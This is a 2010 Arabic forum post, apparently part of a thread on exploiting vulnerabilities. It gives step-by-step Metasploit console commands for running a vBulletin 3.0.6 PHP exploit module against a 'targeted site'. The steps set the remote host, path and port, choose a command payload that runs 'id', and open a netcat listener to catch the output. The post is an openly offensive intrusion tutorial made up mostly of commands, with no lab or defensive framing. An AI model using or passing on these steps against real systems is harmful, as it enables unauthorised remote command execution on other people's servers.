عرض مشاركة واحدة
بياناتي
 رقم المشاركة : ( 3 )
صوت القصيد
مشرف
رقم العضوية : 48
تاريخ التسجيل : Nov 2009
مكان الإقامة :
عدد المشاركات : 2,253
عدد النقاط : 20

صوت القصيد غير متواجد حالياً

برنامج رد: شرح انواع الثغرات وطريقة استغلالها

كُتب : [ 30-07-2010 - 12:56 ]


============================== =====
|3|

الثغرات المكتوبة بـ Framework
============================== =====

لاستغلال هذا النوع يجب ان يكون لدينا برنامج
Metasploit

- نعضع ملف الثغرة في المسار التالي

C:\Program Files\Metasploit Framework\home\framework\explo its

الثغرة تكون بامتداد PM
يمكن فتحها بالمفكرة ..ولاحظ اسم الثغرة:

الان نفتح برنامج
بالذهاب
إلي قائمة Start ثم Programs ثم Metasploit Framework ثم MSFConsole ...
هذه الصورة تم تصغيرها. إضغط هنا لعرض الصورة بالحجم الطبيعي. أبعاد الصورة الأصلية هي 666×331.

لتشغيل الثغرة اكتب هذا الامر
use php_vb3_0_6
هذه الصورة تم تصغيرها. إضغط هنا لعرض الصورة بالحجم الطبيعي. أبعاد الصورة الأصلية هي 667×330.
ولكي نستعرض الخيارات المتاحة نطبق الامر:
show payloads
هذه الصورة تم تصغيرها. إضغط هنا لعرض الصورة بالحجم الطبيعي. أبعاد الصورة الأصلية هي 665×327.

بعد ظهور الخيارات نختار منها
cmd_generic بالامر
set PAYLOAD cmd_generic

هذه الصورة تم تصغيرها. إضغط هنا لعرض الصورة بالحجم الطبيعي. أبعاد الصورة الأصلية هي 663×328.

والان لنرى الخيارات داخل الخيار
cmd_generic نطبق الامر
show options
هذه الصورة تم تصغيرها. إضغط هنا لعرض الصورة بالحجم الطبيعي. أبعاد الصورة الأصلية هي 664×329.

والان نستخدم الخيارات بالترتيب بالاوامر:
set RHOST server's IP
server's IP
= اي بي الموقع المستهدف
set RPATH /vb/misc.php

مكان الاصابة وهو متغير

ثم



set RPORT 80
ثم

set LHOST myIP
myiip
=الاي بي الخاصة بك
ثم



set LPORT 1234
والبورت انت حر في تغييره لكن يجب ان يكون نفسه عند الاتصال بالنت كات
والان استخدم اوامر اللينكس بالامر
set CMD id

هذه الصورة تم تصغيرها. إضغط هنا لعرض الصورة بالحجم الطبيعي. أبعاد الصورة الأصلية هي 666×328.

الان افتح النت كات وتنصت به بالامر
nc -vv -l -p 1234

وفي الاخير نستخدم الامر
exploit
هذه الصورة تم تصغيرها. إضغط هنا لعرض الصورة بالحجم الطبيعي. أبعاد الصورة الأصلية هي 662×328.

وسوف تظهر النتيجة بالنت كات


...
وهكذا نكون اكملنا الشرح لهذا النوع من الثغرات


توقيع : صوت القصيد















رد مع إقتباس